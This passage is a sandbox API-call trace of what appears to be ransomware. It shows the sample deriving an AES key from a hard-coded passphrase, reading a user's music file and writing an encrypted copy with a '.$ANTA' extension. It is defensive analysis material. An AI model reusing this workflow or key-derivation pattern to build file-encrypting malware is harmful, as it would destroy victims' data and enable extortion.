lpMsg=0x144ea34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea34) returned 0 [0109.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0109.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0109.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0109.509] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0109.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0109.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0109.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0109.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796de8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0109.510] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0109.511] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0109.511] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0109.511] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0109.511] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0109.511] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0109.511] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0109.511] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0109.511] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0109.511] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0109.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0109.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca268, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0109.511] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0109.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0109.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0109.512] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0109.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0109.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2788, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0109.512] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0109.512] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0109.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0109.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca1f0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0109.512] CryptHashData (hHash=0x41ac440, pbData=0x17e2728, dwDataLen=0x22, dwFlags=0x1) returned 1 [0109.512] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0109.512] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0109.512] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0109.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0109.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca460, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0109.512] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac440, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac640) returned 1 [0109.512] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0109.513] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0109.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0109.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0109.513] CryptDestroyHash (hHash=0x41ac440) returned 1 [0109.513] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\2 MaJ1.m4a" (normalized: "c:\\users\\fd1hvy\\music\\2 maj1.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0109.513] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.513] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0109.513] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\" (normalized: "c:\\users\\fd1hvy\\music")) returned 0x11 [0109.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ce8 | out: hHeap=0x1780000) returned 1 [0109.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0109.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e70 | out: hHeap=0x1780000) returned 1 [0109.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0109.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0109.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0109.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0109.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0109.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0109.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0109.516] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\2 MaJ1.m4a.$ANTA" (normalized: "c:\\users\\fd1hvy\\music\\2 maj1.m4a.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0109.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0109.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0109.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0109.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0109.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0109.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0109.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0109.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0109.517] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0109.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0109.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0109.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0109.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0109.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0109.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0109.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0109.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0109.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0109.517] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0109.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0109.517] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0109.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0109.517] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0109.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0109.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0109.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0109.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0109.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0109.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0109.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0109.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0109.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0109.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0109.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0109.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0109.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0109.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0109.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0109.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e07020 [0109.521] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0109.521] ReadFile (in: hFile=0x298, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ef28*=0x6fb6, lpOverlapped=0x0) returned 1 [0109.523] ReadFile (in: hFile=0x298, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0109.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0109.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0109.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0109.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0109.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6fb6) returned 0x4516010 [0109.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e07020 | out: hHeap=0x1780000) returned 1 [0109.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0109.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0109.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0109.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0109.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0109.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6fb6) returned 0x451cfd0 [0109.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0109.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0109.527] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0109.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0109.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0109.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0109.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0109.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0109.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6fb6) returned 0x4516010 [0109.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0109.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0109.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0109.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0109.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0109.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0109.528] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0109.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0109.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0109.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0109.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0109.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0109.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0109.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0109.528] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0109.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0109.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0109.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0109.528] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0109.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0109.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0109.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0109.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2430 [0109.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0109.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0109.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0109.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0109.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6fb6) returned 0x4516010 [0109.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0109.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2500 [0109.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0109.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0109.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0109.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2440 [0109.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0109.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0109.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0109.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23a0 [0109.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0109.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0109.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0109.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9f38 [0109.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0109.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0109.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0109.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0109.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0109.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6fb6) returned 0x4523f90 [0109.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0109.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0109.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0109.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0109.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0109.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0109.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0109.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0109.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0109.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0109.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0109.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0109.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0109.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0109.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0109.577] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0109.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0109.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0109.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0109.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0109.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0109.578] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0109.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0109.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0109.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0109.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0109.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0109.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0109.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0109.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0109.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0109.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0109.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0109.578] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: 